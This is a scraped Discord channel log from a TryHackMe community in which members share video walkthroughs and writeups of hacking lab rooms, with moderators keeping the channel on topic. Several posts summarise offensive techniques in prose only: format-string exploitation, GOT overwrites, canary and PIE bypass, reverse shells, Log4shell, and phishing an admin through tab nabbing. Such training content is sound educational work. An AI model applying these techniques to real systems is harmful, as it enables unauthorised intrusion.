#

Ah the licensing bullshit, forgot about that, It was a pain finding a picture on the internet and seeing if it was publicly available whenever you wanted to make a simple video i.e

graceful coral
graceful coral
graceful coral
graceful coral
graceful coral
graceful coral
graceful coral
graceful coral
graceful coral
graceful coral
sullen charm
modern jolt
#

A full-length walkthrough of me completing the Solar room (approved and on the room walkthroughs list): https://youtu.be/25IvtwEwyp4

In this video, I complete TryHackMe's log4j room, Solar! Sorry for the length... I tried to trim it down! Check the timestamps if you need a specific part.
---LINKS---
Check out the Solar room - https://tryhackme.com/room/solar
Watch my video about the log4j vulnerability - https://www.youtube.com/watch?v=wyp2tCBY8jw
Check out John Hammond's You...

โ–ถ Play video
#

There are timestamps in the description for each section of the room.

timber kraken
#

hi guys

sullen charm
waxen grove
#

Report spam

formal iron
#

thanks @waxen grove it's been dealt with (:

fallow remnantBOT
#

Gave +1 Rep to @waxen grove

sullen charm
sullen charm
#

@manic snow I made this for you, I hope you enjoy it

manic snow
#

you can call me haz btw (long story, hxz sounds more like hacks but is actually meant to be haz but i cba changing at this point)

#

that "zee" reminded me you were american

#

i normally hear "h x zed"

formal sparrow
#

xz both being pronounced with z

manic snow
#

there we go

formal sparrow
#

Meh

#

Sorted @manic snow ๐Ÿ˜

sullen charm
#

Yeah people pronounce my username 'ay-tee-eightch' instead of just saying ATHLETE. I thought people could recognize the L337 "hacker-speak" but i guess not

manic snow
sullen charm
#

I wanted to create a box around the two 3s, in d&d ATH is short for Athletics, a proficiency you're often asked to roll during a game

manic snow
#

now we can finally communicate without a language barrier

#

trust me you don't wanna see the code for that ๐Ÿ’€

#

i got lazy

#

".shift()" twice ๐Ÿ˜‚, probably should have made the test.split into a variable too

sullen charm
#

you wanna see lazy?

manic snow
#

๐Ÿ˜‚

manic snow
sullen charm
#

I love it though, our respective countries should give us ambassadorships

manic snow
#

i agree

graceful coral
sullen charm
stable nest
#

Lumberjack Turtle - TryHackMe - Official Walkthrough

https://youtu.be/LDUoD85AVek

This is the official walkthrough for my Lumberjack Turtle challenge room that TryHackMe published last week at https://tryhackme.com/room/lumberjackturtle

Hack hard!

#redteam #tryhackme


Want to get exclusive tips, tricks and killer command line cheats to hack your apps and infrastructure? Join my inner circle at https://learn.vulscan.com/...

โ–ถ Play video
gloomy ruin
#

Streaming the Ignite room on THM ๐Ÿ˜„

tropic lava
#

@sacred ferry Advertising other servers is strictly prohibited

sullen charm
nimble whale
#
stable nest
#
danaepp

So this weekend TryHackMe released a new challenge room called DearQA. It's marked as an Easy room, and it didn't take much time at all for me to complete. However, I've seen a bunch of posts on the forum and on Discord of people struggling. That surprised me, and got me thinking... The Internet is a treasure trove of information when it comes t...

gleaming sundial
fallow remnantBOT
#

Gave +1 Rep to @stable nest

sullen charm
languid slate
#

Walkthrough of DearQA (PWN) with no flag reveal https://www.youtube.com/watch?v=XIBwx2ZEuwI

Detailed walkthrough of DearQA TryHackMe room. Step by step analyzing the binary and understanding how and why the exploit works.

00:00 Intro
01:10 Intro to the room
01:25 Analyzing the binary
04:35 Executing the binary
05:02 Testing for Format String
05:12 Testing for Buffer Overflow
06:15 Checking binary's protections
08:00 Reverse Engineerin...

โ–ถ Play video
sullen charm
wide yacht
queen jackal
#

Hey everyone! New walkthrough of Bounty Hacker! vent

ps: the user.txt and root.txt are blurred... so no copy pasta here ๐Ÿ˜…

https://www.youtube.com/watch?v=QOhsQQlKOSs

Summary:

Feel free to reach out if you think I can help in any way ๐Ÿค—
Discord Community: https://discord.gg/QJ7vErwr2y
Twitter: https://twitter.com/DavidAlvesWeb

Also, show some love to the creator of this great THM room ๐Ÿฅฐ
Twitter: https://twitter.com/sevuhl
Blog: https://sevuhl.wordpress.com/

0:00 - Intro
0:43 - Nmap scan
3:06 - Web App
3:42 ...

โ–ถ Play video
stable nest
slate girder
fallow remnantBOT
#

Gave +1 Rep to @stable nest

slate girder
stable nest
#

Part of the pwncat framework

#

If gcc isnโ€™t on the remote target it compiles it on your machine and then uploads it

slate girder
stable nest
#

You must set the โ€œcrossโ€ variable in pwncatrc so it knows which gcc to use locally

#

It will even compile to an arm target

#

It checks the remote arch and sets the -march flag in gcc

tropic lava
#

Is this TryHackMe content?

chrome whale
#

media of the community ? idk sory sory ma bad

tropic lava
chrome whale
#

if I record a public tryhackme room and upload on youtube is fine or?

tropic lava
mossy igloo
#
Shebu

Lumberjack Turtle is a medium difficulty box from Tryhackme which is entirely focused on Log4j/Log4shell a 0-day vulnerability that caused a havoc on the internet . The website is vulnerable to Log4j & so weโ€™re able to exploit it and get a shell on the box . We find a .dockerenv file in the / directory which indicates we are on a docker containe...

signal oar
chrome whale
signal oar
languid slate
languid slate
#

(If this is considered spam I apologize beforehand)

tropic lava
#

Is this tryhackme content?

languid slate
#

What is considered tryhackme content? Videos referring exclusively to THM rooms?

tropic lava
#

Yeah, video walkthroughs of THM etc.

languid slate
#

In that case no, in this particular video I didn't refer to any specific room.

tropic lava
#

Okay, please keep this channel just for THM content, as the channel topic says.

languid slate
#

Sure thing ๐Ÿ‘ it is support material for several rooms, but not room-specific

solar jacinth
#

My first video "writeup" premieres in ~20 minutes! - https://www.youtube.com/watch?v=XCksAoCN7qU

Join me for some ethical hacking as we try to gain access to the TryHackMe box "Flatline" using Kali Linux! This box gave me a headache, but did I manage to own it in the end?!

Social:
Discord: https://discord.gg/MVsKQnXrC5
Twitter: https://twitter.com/hagslab
Instagram: https://www.instagram.com/hagslab/
GitHub: https://github.com/hagronnestad...

โ–ถ Play video
solar jacinth
fallow remnantBOT
#

Gave +1 Rep to @lime crow

mossy igloo
#
Shebu

Napping is a medium difficulty box from TryHackMe which had a interesting vulnerability called Tab Nabbing to phish the admin of the website to get user danielโ€™s credentials by which we could ssh into the box. We then alter a python file which is run every minute by user adrian to get a reverse shell back as that user. For root, we could execute...

graceful coral
dusty crow
#

I found !

sweet trout
copper crest
#

would somebody like to create a nice icon for my upcoming Layer 2 (MAC Flooding and ARP Poisoning) room? ๐Ÿ™‚ my self-made icon is somewhat lame ๐Ÿ˜„

copper crest
#

thx but it's really just a random pixabay pic and two filters/overlays ^^

fallow remnantBOT
#

Gave +1 Rep to @ripe badge

slate girder
cursive edge
#

adds a old lightbulb

copper crest
#

or what do you think about a depiction like this, for the MITM?

worn lava
#

I believe the WebOSINT room needs to be updated

#

the answers don't work, new number new nameserver etc

cursive edge
#

you are about the 15th person shadow has seen mention that problem in different channels

worn lava
#

ok

#

i should've known

#

but i don't work for thm so i didn't know

formal sparrow
# worn lava i should've known

Not at all :)
You are under no obligation to know, although typing keywords from the problem into the search bar can do wonders too ๐Ÿ˜„

worn lava
#

true

#

i was joking donโ€™t worry anidab

dapper geyser
#

My first writeup ๐Ÿ™‚

dapper geyser
edgy plume
edgy plume
#

Back at it again tonight! ^

mild wagon
languid slate
#

I just uploaded a tutorial for pwn106 from PWN101 room. A thorough step-by-step guide to understand the format string vulnerability. How do format string vulnerabilities happen, why and how can we abuse them. https://www.youtube.com/watch?v=0-ulL3Y0MS8

Understanding the format string vulnerability step by step in this thorough tutorial explaining its very foundations, the underlying concepts. How do format string vulnerabilities happen, why and how can we abuse them. Format String vulnerabilities allow an attacker to both leak memory and corrupt it by writing arbitrary values. In this video we...

โ–ถ Play video
lament pike
#

Is it ok to use screenshots of premium rooms in a writeup? Of the challenges and their solutions ofcourse not the theory concepts

tame ledge
#

Should be fine, no idea why no one replied to you till now

languid slate
#

I just published the tutorial for pwn107 from PWN101 room. An in-depth explanation about bypassing stack canaries and PIE/PIC by abusing a Format String vulnerability. We will understand what a canary is, what is its main purpose and how can we bypass it in order to hijack the program's execution flow. At the same time, we will dig into Position Independent Executable (PIE) or Position Independent Code (PIC) and learn how to bypass it as well, exploiting the same Format String vulnerability. Leaking addresses from the binary will allow us to get the dynamic binary's base address (its base address during execution) to finally perform a ret2win attack https://www.youtube.com/watch?v=FpKL2cAlJbM

Bypassing stack canaries and PIE/PIC by abusing a Format String vulnerability. In this step-by-step tutorial we will understand what a canary is, what is its main purpose and how can we bypass it in order to hijack the program's execution flow. At the same time, we will dig into Position Independent Executable (PIE) or Position Independent Code ...

โ–ถ Play video
jaunty stratus
#

Hi everyone! I stream TryHackMe most nights on Twitch. I'll be spending the next hour and a half (until midnight central time) working through the Throwback Network and working on Active Directory hacking. Would love to have some of you join me. I am live right now... see you soon!
https://twitch.tv/tyler_ramsbey

Twitch

I regularly stream hands-on hacking videos - primarily through TryHackMe, HackTheBox, and VulnHub. If you're interested in Cybersecurity (or simply want to watch some real hacking) come join me for some late night hacking most nights!

โ–ถ Play video
midnight socket
#

Hey I am making a research paper on RDP if anyone is willing to give me criticism I would greatly appreciate it!

tropic lava
#

@midnight socket this channel is for media of tryhackme content

languid slate
#

I just published the tutorial for pwn108 (from the room PWN101). In this video we will see step by step how to overwrite GOT (Global Offset Table) entries by abusing a Format String vulnerability, hence hijacking the execution flow of the program. We will see in detail how to overwrite memory with the %n format specifier from the printf family of functions, understanding how to write 4 or less bytes with the values we desire at the address we want. Besides, bad chars of printf function will be also discussed, which define how the payload must be arranged. https://www.youtube.com/watch?v=9SWYvhY5dYw

In this video we will see step by step how to overwrite GOT (Global Offset Table) entries by abusing a Format String vulnerability, hence hijacking the execution flow of the program. We will see in detail how to overwrite memory with the %n format specifier from the printf family of functions, understanding how to write 4 or less bytes with the ...

โ–ถ Play video
half epoch
#

Hi everyone. I have a YouTube channel where I post a lot of content and writeups of TryHackMe rooms, but I also have other security related content. Feel free to take a peak and if you like it let me know ๐Ÿ™‚

Here is just one video as an example of the room Mr. Phisher
https://youtu.be/IkzvybP046Q

TryHackMe! Mr. Phisher

Like my videos? Would you consider to donate to me I created a possible way for you to do that.

Donation link: https://streamlabs.com/securityinmind/tip

โ–ถ Play video
half epoch
sullen charm
half epoch
#

Latests video about a room that bugged me out a lot. Its a crazy room I will say that. The video got rather long, but I decided to keep it. It shows some struggle, frustration and the person behind it. I hope you like it.
https://www.youtube.com/watch?v=uHg-7Mo7Vio&ab_channel=Securityinmind

This room was rather tricky and really odd at times. In the video you will see me struggle going through my own notes, and just getting to root is going to be even worse. But I will do it all and if you watch the whole video you will learn a lot of different things :)

TryHackMe! Sea Surfer - Not really Medium Difficulty More Like Hard - Long V...

โ–ถ Play video
fallow remnantBOT
#

Gave +1 Rep to @half epoch

half epoch
#

Thanks ๐Ÿ™‚ you made a fun box ๐Ÿ“ฆ

fallow remnantBOT
#

Gave +1 Rep to @ripe badge

half epoch
#

Check out my newest video on a old room.
https://youtu.be/eytRMU-Scns

Enjoy ๐Ÿ™‚

Broken Authentication is a really bad thing but it happens a lot. I have seen it myself many times that students create some new mechanism and from the eye it looks ok and secure, but it is not.

Like my videos? Would you consider to donate to me I created a possible way for you to do that.

Donation link: https://streamlabs.com/securityinmind/tip

โ–ถ Play video
half epoch
#

Overpass 2 Hacked - the second video on the series:

https://youtu.be/gEid56eS0Wc

Its a revisit to the room called Overpass. This room require a bit of analysis before we can hack our way back in and find the user and the room flag.

TryHackMe! Overpass 2 Hacked - Broken Authentication - Traffic Analysis

Like my videos? Would you consider to donate to me I created a possible way for you to do that.

Donation link: https://st...

โ–ถ Play video
half epoch
jaunty stratus
#

Hey all -- I did video walkthroughs & explanations on every threat/room in the "Recent Threats" module. If you get stuck or would like some extra learning, I hope you find these helpful

CVE-2022-26923: https://www.youtube.com/watch?v=a-bCbIqGMCg
Spring4Shell: https://www.youtube.com/watch?v=iWdO9C5Aw_g
Log4J: https://www.youtube.com/watch?v=QDNPsupvAME&t
Dirty Pipe: https://www.youtube.com/watch?v=VfBTEpk2oz0&t
Pwnkit: https://www.youtube.com/watch?v=w5nBnvmYlf8&t
Print Nightmare: https://www.youtube.com/watch?v=FGivGdziLuA

half epoch
#

Check out my new video of the room called Annie. ๐Ÿ™‚ Hope that you like it ๐Ÿ™‚
https://www.youtube.com/watch?v=0q0FH1p9BfM&ab_channel=Securityinmind

Today weยดre looking at the room called Annie on TryHackMe. The room is anounced to be a medium difficult room, but it really felt like an easy room. Check it out and see if you agree :)

Like my videos? Would you consider to donate to me I created a possible way for you to do that.

Donation link: https://streamlabs.com/securityinmind/tip

โ–ถ Play video
half epoch
cursive edge
fallow remnantBOT
#

Gave +1 Rep to @half epoch

half epoch
half epoch
#

Another video that I just recorded, please let me know if you liked it ๐Ÿ™‚

https://www.youtube.com/watch?v=OhIP0C9hxZQ&ab_channel=Securityinmind

In this room on TryHackMe weยดre going to check out the CVE-2022-26134 called Atlassian. The room is fun and really easy, and that is the dangers of exploits. They can be really easy and even a zero-day exploit just about 1 month ago.

Like my videos? Would you consider to donate to me I created a possible way for you to do that.

Donation link: ...

โ–ถ Play video
half epoch
#

I had some extra time on my hands and I was browsing rooms about git. Found one ๐Ÿ™‚

https://youtu.be/iCo7BsvbQOw

This video I will be going through the room called Git Happens and talk about the implications there are when sensitive information is forgotten in a repository.

Like my videos? Would you consider to donate to me I created a possible way for you to do that.

Donation link: https://streamlabs.com/securityinmind/tip

โ–ถ Play video
tropic lava
#

@graceful coral This channel is for tryhackme content

half epoch
#

Old room but new video. I felt like a piece of chocolate. Check it out ๐Ÿ™‚

https://www.youtube.com/watch?v=yMftk9uJC90&ab_channel=Securityinmind

I like chokolate and TryHackMe. In this video weยดre going to check out the room called Chocolate Factory. Is it all about Chocolate or is there a Factory, check it out to find out :)

Like my videos? Would you consider to donate to me I created a possible way for you to do that.

Donation link: https://streamlabs.com/securityinmind/tip

โ–ถ Play video
half epoch
proper echo
half epoch
main silo
half epoch
#

It tells that the room "committed is 121 days old". I guess thats not true then ๐Ÿ™‚

main silo
slate crescent
half epoch
#

Fontaene and i.

#

๐Ÿ™‚

slate crescent
jaunty stratus
wide yacht